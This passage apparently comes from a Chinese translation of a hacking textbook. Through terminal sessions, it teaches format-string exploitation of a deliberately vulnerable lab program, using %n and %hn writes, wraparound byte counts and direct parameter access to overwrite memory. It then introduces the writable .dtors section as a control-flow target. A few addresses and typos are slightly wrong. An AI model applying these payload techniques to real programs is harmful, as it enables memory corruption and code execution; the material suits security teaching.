reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\xd7\xfd\xff\xbf")%08x.%08x.%08x.%s
The right way to print user-controlled input:
????%08x.%08x.%08x.%s
The wrong way to print user-controlled input:
????bffff3d0.b7fe75fc.00000000./usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:
/bin:/
usr/games
[*] test_val @ 0x08049794 = -72 0xffffffb8
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%08x.%08x.%08x.%n
The right way to print user-controlled input:
??%08x.%08x.%08x.%n
The wrong way to print user-controlled input:
??bffff3d0.b7fe75fc.00000000.
[*] test_val @ 0x08049794 = 31 0x0000001f 
reader@hacking:~/booksrc $

如此所示，test_val 变量确实可以使用 %n 格式参数被覆盖。测试变量中的结果值取决于在 %n 之前写入的字节数。这可以通过操作字段宽度选项来更好地控制。

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%x%n
The right way to print user-controlled input:
??%x%x%x%n
The wrong way to print user-controlled input:
??bffff3d0b7fe75fc0
[*] test_val @ 0x08049794 = 21 0x00000015
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%100x%n
The right way to print user-controlled input:
??%x%x%100x%n
The wrong way to print user-controlled input:
??bffff3d0b7fe75fc
0
[*] test_val @ 0x08049794 = 120 0x00000078
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%180x%n
The right way to print user-controlled input:
??%x%x%180x%n
The wrong way to print user-controlled input:
??bffff3d0b7fe75fc
0
[*] test_val @ 0x08049794 = 200 0x000000c8
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%400x%n
The right way to print user-controlled input:
??%x%x%400x%n
The wrong way to print user-controlled input:
??bffff3d0b7fe75fc
0
[*] test_val @ 0x08049794 = 420 0x000001a4 
reader@hacking:~/booksrc $

通过在 %n 之前的格式参数中操作字段宽度选项，可以插入一定数量的空格，导致输出中出现一些空白行。这些行反过来可以用来控制 %n 格式参数之前写入的字节数。这种方法适用于较小的数字，但对于较大的数字，如内存地址，则不适用。

通过查看 test_val 值的十六进制表示，很明显最低有效字节可以很好地控制。（记住，最低有效字节实际上位于四个字节的内存单词的第一个字节。）这个细节可以用来写入整个地址。如果按顺序在连续的内存地址上写入四次，最低有效字节可以写入四个字节的每个字节，如下所示：

`Memory                       94 95 96 97`
First write to 0x08049794    AA 00 00 00
Second write to 0x08049795      BB 00 00 00
Third write to 0x08049796          CC 00 00 00
Fourth write to 0x08049797            DD 00 00 00
`Result                       AA BB CC DD`

例如，让我们尝试将地址 0xDDCCBBAA 写入测试变量。在内存中，测试变量的第一个字节应该是 0xAA，然后是 0xBB，然后是 0xCC，最后是 0xDD。通过向内存地址 0x08049794, 0x08049795, 0x08049796 和 0x08049797 分别写入，应该能够完成这个操作。第一次写入将写入值 0x000000aa，第二次 0x000000bb，第三次 0x000000cc，最后 0x000000dd。

第一次写入应该很简单。

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%8x%n
The right way to print user-controlled input:
??%x%x%8x%n
The wrong way to print user-controlled input:
??bffff3d0b7fe75fc       0
[*] test_val @ 0x08049794 = 28 0x0000001c
reader@hacking:~/booksrc $ gdb -q
(gdb) p 0xaa - 28 + 8
$1 = 150
(gdb) quit
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%150x%n
The right way to print user-controlled input:
??%x%x%150x%n
The wrong way to print user-controlled input:
??bffff3d0b7fe75fc
0
[*] test_val @ 0x08049794 = 170 0x000000aa 
reader@hacking:~/booksrc $

最后一个 %x 格式参数使用 8 作为字段宽度以标准化输出。这本质上是从堆中读取一个随机的 DWORD，它可以输出从 1 到 8 个字符。由于第一次覆盖将 28 放入 test_val，使用 150 作为字段宽度而不是 8 应该控制 test_val 的最低有效字节为 0xAA。

接下来是下一次写入。需要另一个参数来为另一个 %x 格式参数增加字节计数到 187，即十进制的 0xBB。这个参数可以是任何东西；它只需要是四个字节长，并且必须位于第一个任意内存地址 0x08049754 之后。由于这仍然是在格式字符串的内存中，它可以很容易地被控制。单词 JUNK 是四个字节长，将工作得很好。

之后，下一个要写入的内存地址 0x08049755 应该放入内存中，以便第二个 %n 格式参数可以访问它。这意味着格式字符串的起始部分应该由目标内存地址、四个字节的垃圾数据，然后是目标内存地址加一组成。但是，这些内存字节也会被格式函数打印出来，从而增加用于 %n 格式参数的字节计数器。这变得越来越复杂。

也许我们应该提前考虑格式字符串的起始部分。目标是进行四次写入。每次写入都需要传递一个内存地址，并且在这其中，需要四个字节的垃圾数据来正确增加 %n 格式参数的字节计数器。第一个 %x 格式参数可以使用在格式字符串本身之前找到的四个字节，但剩下的三个将需要提供数据。对于整个写入过程，格式字符串的起始部分应该看起来像这样：

图 0x300-4。

让我们试一试。

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08JUNK\x95\x97\x04\x08JUNK\
x96\
x97\x04\x08JUNK\x97\x97\x04\x08")%x%x%8x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%8x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3c0b7fe75fc       0
[*] test_val @ 0x08049794 = 52 0x00000034
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xaa - 52 + 8"
$1 = 126
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08JUNK\x95\x97\x04\x08JUNK\
x96\
x97\x04\x08JUNK\x97\x97\x04\x08")%x%x%126x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%126x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3c0b7fe75fc
0
[*] test_val @ 0x08049794 = 170 0x000000aa 
reader@hacking:~/booksrc $

格式字符串起始部分的地址和垃圾数据改变了 %x 格式参数所需的字段宽度选项的值。然而，这可以通过之前的方法轻松重新计算。另一种可能的方法是从之前的字段宽度值 150 中减去 24，因为格式字符串前面增加了 6 个新的 4 字节单词。

现在所有的内存都在格式字符串的起始部分设置好了，第二次写入应该很简单。

reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xbb - 0xaa"
$1 = 17
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08JUNK\x95\x97\x04\x08JUNK\
x96\
x97\x04\x08JUNK\x97\x97\x04\x08")%x%x%126x%n%17x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%126x%n%17x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3b0b7fe75fc
   0         4b4e554a
[*] test_val @ 0x08049794 = 48042 0x0000bbaa 
reader@hacking:~/booksrc $

下一个期望的最低有效字节值是 0xBB。一个十六进制计算器很快就会显示在下一个 %n 格式参数之前需要写入 17 个字节。由于已经为 %x 格式参数设置了内存，使用字段宽度选项写入 17 个字节很简单。

这个过程可以重复进行第三次和第四次写入。

reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xcc - 0xbb"
$1 = 17
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xdd - 0xcc"
$1 = 17
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08JUNK\x95\x97\x04\x08JUNK\
x96\
x97\x04\x08JUNK\x97\x97\x04\x08")%x%x%126x%n%17x%n%17x%n%17x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%126x%n%17x%n%17x%n%17x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3b0b7fe75fc
   0         4b4e554a         4b4e554a         4b4e554a
[*] test_val @ 0x08049794 = -573785174 0xddccbbaa 
reader@hacking:~/booksrc $

通过控制最低有效字节并执行四次写入，可以写入任何内存地址的整个地址。需要注意的是，使用这种技术也会覆盖目标地址之后的三个字节。这可以通过在 test_val 之后立即静态声明另一个初始化变量 next_val 并在调试输出中显示此值来快速探索。这些更改可以在编辑器中或使用一些 sed 魔法来完成。

在这里，next_val 被初始化为值 0x11111111，因此写入操作对它的影响将很明显。

reader@hacking:~/booksrc $ sed -e 's/72;/72, next_val = 0x11111111;/;/@/{h;s/test/next/
g;x;G}'
fmt_vuln.c > fmt_vuln2.c
reader@hacking:~/booksrc $ diff fmt_vuln.c fmt_vuln2.c
7c7
<    static int test_val = -72;
---
> static int test_val = -72, next_val = 0x11111111;
27a28
> printf("[*] next_val @ 0x%08x = %d 0x%08x\n", &next_val, next_val, next_val);
reader@hacking:~/booksrc $ gcc -o fmt_vuln2 fmt_vuln2.c 
reader@hacking:~/booksrc $ ./fmt_vuln2 test
The right way:
test
The wrong way:
test
[*] test_val @ 0x080497b4 = -72 0xffffffb8
[*] next_val @ 0x080497b8 = 286331153 0x11111111
reader@hacking:~/booksrc $

如前所述的输出所示，代码更改也移动了 test_val 变量的地址。然而，next_val 显示出它紧邻 test_val。为了练习，让我们再次将地址写入变量 test_val，使用新的地址。

上次使用了一个非常方便的地址 0xodccbbaa。由于每个字节都大于前一个字节，因此很容易为每个字节增加字节计数器。但是，如果使用像 0x0806abcd 这样的地址呢？使用这个地址，0xCD 的第一个字节很容易通过 %n 格式参数写入，输出总共 205 个字节，字段宽度为 161。但是接下来要写入的下一个字节是 0xAB，需要输出 171 个字节。虽然很容易增加 %n 格式参数的字节计数器，但无法从中减去。

reader@hacking:~/booksrc $ ./fmt_vuln2 AAAA%x%x%x%x
The right way to print user-controlled input:
AAAA%x%x%x%x
The wrong way to print user-controlled input:
AAAAbffff3d0b7fe75fc041414141
[*] test_val @ 0x080497f4 = -72 0xffffffb8
[*] next_val @ 0x080497f8 = 286331153 0x11111111
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xcd - 5"
$1 = 200
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\
xf6\
x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%8x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%8x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3c0b7fe75fc       0
[*] test_val @ 0x08049794 = -72 0xffffffb8
reader@hacking:~/booksrc $ 
reader@hacking:~/booksrc $ ./fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\
xf6\
x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%8x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%8x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3c0b7fe75fc       0
[*] test_val @ 0x080497f4 = 52 0x00000034
[*] next_val @ 0x080497f8 = 286331153 0x11111111
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xcd - 52 + 8"
$1 = 161
reader@hacking:~/booksrc $ ./fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\
xf6\
x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%161x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%161x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3b0b7fe75fc
                                       0
[*] test_val @ 0x080497f4 = 205 0x000000cd
[*] next_val @ 0x080497f8 = 286331153 0x11111111
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xab - 0xcd"
$1 = -34 
reader@hacking:~/booksrc $

而不是尝试从 205 减去 34，最低有效字节通过将 205 加上 222 得到 427（这是 0x1AB 的十进制表示），被循环到 0x1AB。这种技术可以再次循环并设置第三次写入的最低有效字节为 0x06。

reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0x1ab - 0xcd"
$1 = 222
reader@hacking:~/booksrc $ gdb -q --batch -ex "p /d 0x1ab"
$1 = 427
reader@hacking:~/booksrc $ ./fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\
xf6\
x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%161x%n%222x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%161x%n%222x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3b0b7fe75fc
                                       0
                                                      4b4e554a
[*] test_val @ 0x080497f4 = 109517 0x0001abcd
[*] next_val @ 0x080497f8 = 286331136 0x11111100
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0x06 - 0xab"
$1 = -165
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0x106 - 0xab"
$1 = 91
reader@hacking:~/booksrc $ ./fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\
xf6\
x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%161x%n%222x%n%91x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%161x%n%222x%n%91x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3b0b7fe75fc
                                       0
                                                    4b4e554a
                           4b4e554a
[*] test_val @ 0x080497f4 = 33991629 0x0206abcd
[*] next_val @ 0x080497f8 = 286326784 0x11110000
reader@hacking:~/booksrc $

每次写入都会覆盖 test_val 旁边 next_val 变量的字节。循环技术似乎工作得很好，但在尝试最后一个字节时出现了一个小问题。

reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0x08 - 0x06"
$1 = 2
reader@hacking:~/booksrc $ ./fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\
xf6\
x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%161x%n%222x%n%91x%n%2x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%161x%n%222x%n%91x%n%2x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3a0b7fe75fc
                                  0
                                                      4b4e554a
                           4b4e554a4b4e554a
[*] test_val @ 0x080497f4 = 235318221 0x0e06abcd
[*] next_val @ 0x080497f8 = 285212674 0x11000002 
reader@hacking:~/booksrc $

这里发生了什么？0x06 和 0x08 之间的差异只有两个，但输出了八个字节，导致 %n 格式参数写入了字节 0x0e。这是因为 %x 格式参数的字段宽度选项只是一个最小字段宽度，并且输出了八个字节的数据。这个问题可以通过再次循环来缓解；然而，了解字段宽度选项的限制是很好的。

reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0x108 - 0x06"
$1 = 258
reader@hacking:~/booksrc $ ./fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\
xf6\
x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%161x%n%222x%n%91x%n%258x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%161x%n%222x%n%91x%n%258x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3a0b7fe75fc
                                  0
                                                      4b4e554a
                           4b4e554a
                                                                  4b4e554a
[*] test_val @ 0x080497f4 = 134654925 0x0806abcd
[*] next_val @ 0x080497f8 = 285212675 0x11000003
reader@hacking:~/booksrc $

就像之前一样，适当的地址和垃圾数据被放在格式字符串的开头，并且最低有效字节通过四次写入操作来控制，以覆盖变量 test_val 的所有四个字节。对最低有效字节的任何减值都可以通过循环字节来实现。同样，任何小于八的加法可能也需要以类似的方式循环。

直接参数访问

直接参数访问是一种简化格式字符串漏洞的方法。在之前的漏洞中，每个格式参数参数都必须按顺序遍历。这需要使用多个%x格式参数来遍历参数参数，直到达到格式字符串的开头。此外，顺序性质需要三个 4 字节的垃圾数据来正确地将一个地址写入任意内存位置。

正如其名所示，直接参数访问允许通过使用美元符号限定符直接访问参数。例如，*%n``$d会访问第n个参数并以十进制形式显示它。

printf("7th: %7$d, 4th: %4$05d \n", 10, 20, 30, 40, 50, 60, 70, 80);

前面的printf()调用将产生以下输出：

7th: 70, 4th: 00040

首先，当遇到格式参数%7$d时，数字70以十进制形式输出，因为第七个参数是 70。第二个格式参数访问第四个参数并使用字段宽度选项05。所有其他参数参数保持不变。这种直接访问方法消除了需要遍历内存直到找到格式字符串开头的需求，因为可以直接访问这段内存。以下输出显示了直接参数访问的使用。

reader@hacking:~/booksrc $ ./fmt_vuln AAAA%x%x%x%x
The right way to print user-controlled input:
AAAA%x%x%x%x
The wrong way to print user-controlled input:
AAAAbffff3d0b7fe75fc041414141
[*] test_val @ 0x08049794 = -72 0xffffffb8
reader@hacking:~/booksrc $ ./fmt_vuln AAAA%4\$x
The right way to print user-controlled input:
AAAA%4$x
The wrong way to print user-controlled input:
AAAA41414141
[*] test_val @ 0x08049794 = -72 0xffffffb8 
reader@hacking:~/booksrc $

在这个例子中，格式字符串的开头位于第四个参数参数。而不是使用%x格式参数遍历前三个参数参数，可以直接访问这段内存。由于这是在命令行上进行的，而美元符号是一个特殊字符，因此必须使用反斜杠转义。这仅仅告诉命令 shell 避免尝试将美元符号解释为特殊字符。正确的格式字符串可以在打印时看到。

直接参数访问还简化了内存地址的编写。由于可以直接访问内存，因此不需要四个字节的垃圾数据空格来增加字节数输出计数。通常执行此功能的每个%x格式参数可以直接访问格式字符串之前找到的一块内存。为了练习，让我们使用直接参数访问将看起来更真实的地址0xbffffd72写入变量test_vals 中。

reader@hacking:~/booksrc $ ./fmt_vuln $(perl -e 'print "\x94\x97\x04\x08" . "\x95\x97\x04\
x08"
. "\x96\x97\x04\x08" . "\x97\x97\x04\x08"')%4\$n
The right way to print user-controlled input:
????????%4$n
The wrong way to print user-controlled input:
????????
[*] test_val @ 0x08049794 = 16 0x00000010
reader@hacking:~/booksrc $ gdb -q
(gdb) p 0x72 - 16
`$1 = 98`
(gdb) p 0xfd - 0x72
`$2 = 139`
(gdb) p 0xff - 0xfd
$3 = 2
(gdb) p 0x1ff - 0xfd
`$4 = 258`
(gdb) p 0xbf - 0xff
$5 = -64
(gdb) p 0x1bf - 0xff
`$6 = 192`
(gdb) quit
reader@hacking:~/booksrc $ ./fmt_vuln $(perl -e 'print "\x94\x97\x04\x08" . "\x95\x97\x04\
x08"
. "\x96\x97\x04\x08" . "\x97\x97\x04\x08"')%98x%4\$n%139x%5\$n
The right way to print user-controlled input:
????????%98x%4$n%139x%5$n
The wrong way to print user-controlled input:
????????
                                                                 bffff3c0
                                                 b7fe75fc
[*] test_val @ 0x08049794 = 64882 0x0000fd72
reader@hacking:~/booksrc $ ./fmt_vuln $(perl -e 'print "\x94\x97\x04\x08" . "\x95\x97\x04\
x08"
. "\x96\x97\x04\x08" . "\x97\x97\x04\x08"')%98x%4\$n%139x%5\$n%258x%6\$n%192x%7\$n
The right way to print user-controlled input:
????????%98x%4$n%139x%5$n%258x%6$n%192x%7$n
The wrong way to print user-controlled input:
???????? 
                                                                bffff3b0
                                                 b7fe75fc
                            0
                                   8049794
[*] test_val @ 0x08049794 = -1073742478 0xbffffd72
reader@hacking:~/booksrc $

由于不需要打印堆栈来达到我们的地址，第一个格式参数写入的字节数是 16。直接参数访问仅用于%n参数，因为对于%x空格参数使用的值实际上并不重要。这种方法简化了编写地址的过程，并缩小了必需的格式字符串大小。

使用简短写作

另一种可以简化格式字符串漏洞的技术是使用短写。通常，短是一个双字节字，格式参数有特殊的方式来处理它们。有关可能的格式参数的更完整描述可以在 printf 手册页中找到。描述长度修饰符的部分如下所示。

	The length modifier
	    Here, integer conversion stands for d, i, o, u, x, or X conversion.

	    h      A following integer conversion corresponds to a short int or
	           unsigned short int argument, or a following n conversion
	           corresponds to a pointer to a short int argument.

这可以与格式字符串漏洞一起使用来写入双字节短整型。在下面的输出中，一个短整型（粗体显示）被写入四个字节 test_val 变量的两端。自然地，仍然可以直接访问参数。

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%x%hn
The right way to print user-controlled input:
??%x%x%x%hn
The wrong way to print user-controlled input:
??bffff3d0b7fe75fc0
[*] test_val @ 0x08049794 = -65515 0xffff 0015
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x96\x97\x04\x08")%x%x%x%hn
The right way to print user-controlled input:
??%x%x%x%hn
The wrong way to print user-controlled input:
??bffff3d0b7fe75fc0
[*] test_val @ 0x08049794 = 1441720  0x0015ffb8
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x96\x97\x04\x08")%4\$hn
The right way to print user-controlled input:
??%4$hn
The wrong way to print user-controlled input:
??
[*] test_val @ 0x08049794 = 327608 0x0004ffb8 
reader@hacking:~/booksrc $

使用短写，可以使用两个 %hn 参数覆盖整个四个字节的值。在下面的示例中，test_val 变量将被再次覆盖，地址为 0xbffffd72。

reader@hacking:~/booksrc $ gdb -q
(gdb) p 0xfd72 - 8
$1 = 64874
(gdb) p 0xbfff - 0xfd72
$2 = -15731
(gdb) p 0x1bfff - 0xfd72
$3 = 49805
(gdb) quit
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08\x96\x97\x04\x08")
%64874x%4\
$hn%49805x%5\$hn
The right way to print user-controlled input:
????%64874x%4$hn%49805x%5$hn
The wrong way to print user-controlled input:
b7fe75fc
[*] test_val @ 0x08049794 = -1073742478 0xbffffd72 
reader@hacking:~/booksrc $

前面的示例使用了一个类似的环绕方法来处理 0xbfff 的第二次写入小于 0xfd72 的第一次写入。使用短写，写入的顺序并不重要，因此第一次写入可以是 0xfd72，第二次是 0xbfff，如果两个传递的地址在位置上交换。在下面的输出中，首先写入地址 0x08049796，然后写入地址 0x08049794。

(gdb) p 0xbfff - 8
$1 = 49143
(gdb) p 0xfd72 - 0xbfff
$2 = 15731
(gdb) quit
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x96\x97\x04\x08\x94\x97\x04\x08")
%49143x%4\
$hn%15731x%5\$hn
The right way to print user-controlled input:
????%49143x%4$hn%15731x%5$hn
The wrong way to print user-controlled input:
????

                                                       b7fe75fc
[*] test_val @ 0x08049794 = -1073742478 0xbffffd72
reader@hacking:~/booksrc $

覆写任意内存地址的能力意味着能够控制程序的执行流程。一个选项是覆盖最近栈帧中的返回地址，就像在基于栈的溢出中所做的那样。虽然这是一个可能的选项，但还有其他具有更可预测内存地址的目标。基于栈的溢出性质仅允许覆盖返回地址，但格式字符串提供了覆盖任何内存地址的能力，这创造了其他可能性。

使用 .dtors 的旁路

在使用 GNU C 编译器编译的二进制程序中，为析构函数和构造函数分别创建了名为 .dtors 和 .ctors 的特殊表部分。构造函数在执行 main() 函数之前执行，析构函数在 main() 函数通过退出系统调用退出之前执行。析构函数和 .dtors 表部分特别引人关注。

函数可以通过定义析构属性来声明为析构函数，如 dtors_sample.c 中所示。

dtors_sample.c

#include <stdio.h>
#include <stdlib.h>

static void cleanup(void) __attribute__ ((destructor));

main() {
   printf("Some actions happen in the main() function..\n");
   printf("and then when main() exits, the destructor is called..\n");

   exit(0);
}

void cleanup(void) {
   printf("In the cleanup function now..\n"); 
}

在前面的代码示例中，cleanup() 函数使用析构属性定义，因此当 main() 函数退出时，函数会自动调用，如下所示。

reader@hacking:~/booksrc $ gcc -o dtors_sample dtors_sample.c
reader@hacking:~/booksrc $ ./dtors_sample
Some actions happen in the main() function..
and then when main() exits, the destructor is called..
In the cleanup() function now.. 
reader@hacking:~/booksrc $

这种在退出时自动执行函数的行为是由二进制的 .dtors 表部分控制的。这个部分是一个以 NULL 地址结尾的 32 位地址数组。数组始终以 0xffffffff 开头，以 0x00000000 的 NULL 地址结束。在这两者之间是所有已声明具有析构属性的函数的地址。

可以使用 nm 命令找到 cleanup() 函数的地址，并使用 objdump 检查二进制的部分。

reader@hacking:~/booksrc $ nm ./dtors_sample
080495bc d _DYNAMIC
08049688 d _GLOBAL_OFFSET_TABLE_
080484e4 R _IO_stdin_used
         w _Jv_RegisterClasses
080495a8 d __CTOR_END__
080495a4 d __CTOR_LIST__ 
080495b4 d __DTOR_END__
080495ac d __DTOR_LIST__
080485a0 r __FRAME_END__
080495b8 d __JCR_END__
080495b8 d __JCR_LIST__
080496b0 A __bss_start
080496a4 D __data_start
08048480 t __do_global_ctors_aux
08048340 t __do_global_dtors_aux
080496a8 D __dso_handle
         w __gmon_start__
08048479 T __i686.get_pc_thunk.bx
080495a4 d __init_array_end
080495a4 d __init_array_start
08048400 T __libc_csu_fini
08048410 T __libc_csu_init
         U __libc_start_main@@GLIBC_2.0
080496b0 A _edata
080496b4 A _end
080484b0 T _fini
080484e0 R _fp_hw
0804827c T _init
080482f0 T _start
08048314 t call_gmon_start
`080483e8 t cleanup`
080496b0 b completed.1
080496a4 W data_start
         U exit@@GLIBC_2.0
08048380 t frame_dummy
080483b4 T main
080496ac d p.0
         U printf@@GLIBC_2.0 
reader@hacking:~/booksrc $

nm 命令显示 cleanup() 函数位于 0x080483e8（如下所示加粗）。它还揭示了 .dtors 部分从 0x080495ac 开始以 __DTOR_LIST__（）结束，并在 0x080495b4（）结束。这意味着 0x080495ac 应该包含 0xffffffff，0x080495b4 应该包含 0x00000000，它们之间的地址（0x080495b0）应该包含 cleanup() 函数的地址（0x080483e8）。

objdump 命令显示了 .dtors 部分的实际内容（如下所示加粗），尽管格式略令人困惑。80495ac 的第一个值只是显示了 .dtors 部分所在的位置地址。然后显示了实际的字节，而不是 DWORD，这意味着字节是反向的。考虑到这一点，一切看起来都是正确的。

reader@hacking:~/booksrc $ objdump -s -j .dtors ./dtors_sample

./dtors_sample:     file format elf32-i386

Contents of section .dtors:
 80495ac `ffffffff e8830408 00000000`           ............
reader@hacking:~/booksrc $

关于 .dtors 部分的另一个有趣细节是它是可写的。通过显示 .dtors 部分未标记为 READONLY，对象转储将验证这一点。

reader@hacking:~/booksrc $ objdump -h ./dtors_sample

./dtors_sample:     file format elf32-i386

Sections:
Idx Name          Size      VMA       LMA       File off  Algn
  0 .interp       00000013  08048114  08048114  00000114  2**0
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  1 .note.ABI-tag 00000020  08048128  08048128  00000128  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  2 .hash         0000002c  08048148  08048148  00000148  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  3 .dynsym       00000060  08048174  08048174  00000174  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  4 .dynstr       00000051  080481d4  080481d4  000001d4  2**0
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  5 .gnu.version  0000000c  08048226  08048226  00000226  2**1
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  6 .gnu.version_r 00000020  08048234  08048234  00000234  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  7 .rel.dyn      00000008  08048254  08048254  00000254  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  8 .rel.plt      00000020  0804825c  0804825c  0000025c  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  9 .init         00000017  0804827c  0804827c  0000027c  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 10 .plt          00000050  08048294  08048294  00000294  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 11 .text         000001c0  080482f0  080482f0  000002f0  2**4
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 12 .fini         0000001c  080484b0  080484b0  000004b0  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 13 .rodata       000000bf  080484e0  080484e0  000004e0  2**5
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
 14 .eh_frame     00000004  080485a0  080485a0  000005a0  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
 15 .ctors        00000008  080495a4  080495a4  000005a4  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 16 .dtors        0000000c  080495ac  080495ac  000005ac  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 17 .jcr          00000004  080495b8  080495b8  000005b8  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 18 .dynamic      000000c8  080495bc  080495bc  000005bc  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 19 .got          00000004  08049684  08049684  00000684  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 20 .got.plt      0000001c  08049688  08049688  00000688  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 21 .data         0000000c  080496a4  080496a4  000006a4  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 22 .bss          00000004  080496b0  080496b0  000006b0  2**2
                  ALLOC
 23 .comment      0000012f  00000000  00000000  000006b0  2**0
                  CONTENTS, READONLY
 24 .debug_aranges 00000058  00000000  00000000  000007e0  2**3
                  CONTENTS, READONLY, DEBUGGING
 25 .debug_pubnames 00000025  00000000  00000000  00000838  2**0
                  CONTENTS, READONLY, DEBUGGING
 26 .debug_info   000001ad  00000000  00000000  0000085d  2**0
                  CONTENTS, READONLY, DEBUGGING
 27 .debug_abbrev 00000066  00000000  00000000  00000a0a  2**0
                  CONTENTS, READONLY, DEBUGGING
 28 .debug_line   0000013d  00000000  00000000  00000a70  2**0
                  CONTENTS, READONLY, DEBUGGING
 29 .debug_str    000000bb  00000000  00000000  00000bad  2**0
                  CONTENTS, READONLY, DEBUGGING
 30 .debug_ranges 00000048  00000000  00000000  00000c68  2**3
                  CONTENTS, READONLY, DEBUGGING 
reader@hacking:~/booksrc $

关于 .dtors 部分的另一个有趣细节是，它是所有使用 GNU C 编译器编译的二进制文件的一部分，无论是否声明了具有析构器属性的函数。这意味着易受攻击的格式字符串程序 fmt_vuln.c 必须有一个不包含任何内容的 .dtors 部分可以使用 nm 和 objdump 进行检查。

reader@hacking:~/booksrc $ nm ./fmt_vuln | grep DTOR
08049694 d __DTOR_END__
08049690 d __DTOR_LIST__
reader@hacking:~/booksrc $ objdump -s -j .dtors ./fmt_vuln

